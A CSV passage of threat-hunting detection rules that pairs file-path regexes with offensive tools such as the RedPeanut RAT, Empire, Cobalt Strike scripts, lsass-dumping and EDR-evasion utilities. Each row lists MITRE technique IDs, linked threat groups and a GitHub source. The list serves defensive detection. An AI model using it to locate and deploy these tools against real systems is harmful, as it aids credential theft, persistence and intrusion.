"*/RedPeanut.git*",".{0,1000}\/RedPeanut\.git.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10290"
"*/RedPeanut.html*",".{0,1000}\/RedPeanut\.html.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10291"
"*/RedPeanutAgent/*",".{0,1000}\/RedPeanutAgent\/.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10292"
"*/RedPeanutRP/*",".{0,1000}\/RedPeanutRP\/.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","10293"
"*/RedPersist.exe*",".{0,1000}\/RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","10294"
"*/RedPersist.git*",".{0,1000}\/RedPersist\.git.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","10295"
"*/redpill.ps1*",".{0,1000}\/redpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10296"
"*/redpill/bin/*.ps1*",".{0,1000}\/redpill\/bin\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","#linux","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10297"
"*/redsocks.sh*",".{0,1000}\/redsocks\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","#linux","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","10298"
"*/redsocks-fw.sh*",".{0,1000}\/redsocks\-fw\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","#linux","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","10299"
"*/RedTeam_toolkit*",".{0,1000}\/RedTeam_toolkit.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","10300"
"*/RedTeam_Tools_n_Stuff.git*",".{0,1000}\/RedTeam_Tools_n_Stuff\.git.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","1","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","10301"
"*/red-team-scripts*",".{0,1000}\/red\-team\-scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","10303"
"*/RedWarden.git*",".{0,1000}\/RedWarden\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","10304"
"*/ReferenceSourceLibraries/Sharpire*",".{0,1000}\/ReferenceSourceLibraries\/Sharpire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","10305"
"*/ReflectDump.exe*",".{0,1000}\/ReflectDump\.exe.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","1","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","10306"
"*/ReflectiveDll.c*",".{0,1000}\/ReflectiveDll\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","10307"
"*/ReflectiveDll.x64.dll*",".{0,1000}\/ReflectiveDll\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10308"
"*/ReflectiveDLLInjection/*",".{0,1000}\/ReflectiveDLLInjection\/.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","10309"
"*/ReflectiveLoader.c*",".{0,1000}\/ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","10310"
"*/ReflectiveNtdll.git*",".{0,1000}\/ReflectiveNtdll\.git.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","10311"
"*/ReflectivePick_x64.dll*",".{0,1000}\/ReflectivePick_x64\.dll.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","10312"
"*/ReflectivePick_x86.dll*",".{0,1000}\/ReflectivePick_x86\.dll.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","10313"
"*/RefleXXion.git*",".{0,1000}\/RefleXXion\.git.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","10314"
"*/reg_hive_sam.py*",".{0,1000}\/reg_hive_sam\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10315"
"*/reg_hive_security.py*",".{0,1000}\/reg_hive_security\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10316"
"*/reg_hive_system.py*",".{0,1000}\/reg_hive_system\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10317"
"*/reg_recover-rs.exe*",".{0,1000}\/reg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10318"
"*/reGeorg.git*",".{0,1000}\/reGeorg\.git.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","10319"
"*/RegfDenyTSConnections.ps1*",".{0,1000}\/RegfDenyTSConnections\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","10320"
"*/reghivebackup.zip*",".{0,1000}\/reghivebackup\.zip.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","1","#registry","N/A","10","10","N/A","N/A","N/A","N/A","10321"
"*/register dll.exe*",".{0,1000}\/register\sdll\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10322"
"*/RegistryPersistence.c*",".{0,1000}\/RegistryPersistence\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","10323"
"*/registry-read.py*",".{0,1000}\/registry\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10324"
"*/Registry-Recon/*",".{0,1000}\/Registry\-Recon\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","N/A","10","10","325","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z","10325"
"*/reg-query.py*",".{0,1000}\/reg\-query\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10326"
"*/RegRdpPort.ps1*",".{0,1000}\/RegRdpPort\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10327"
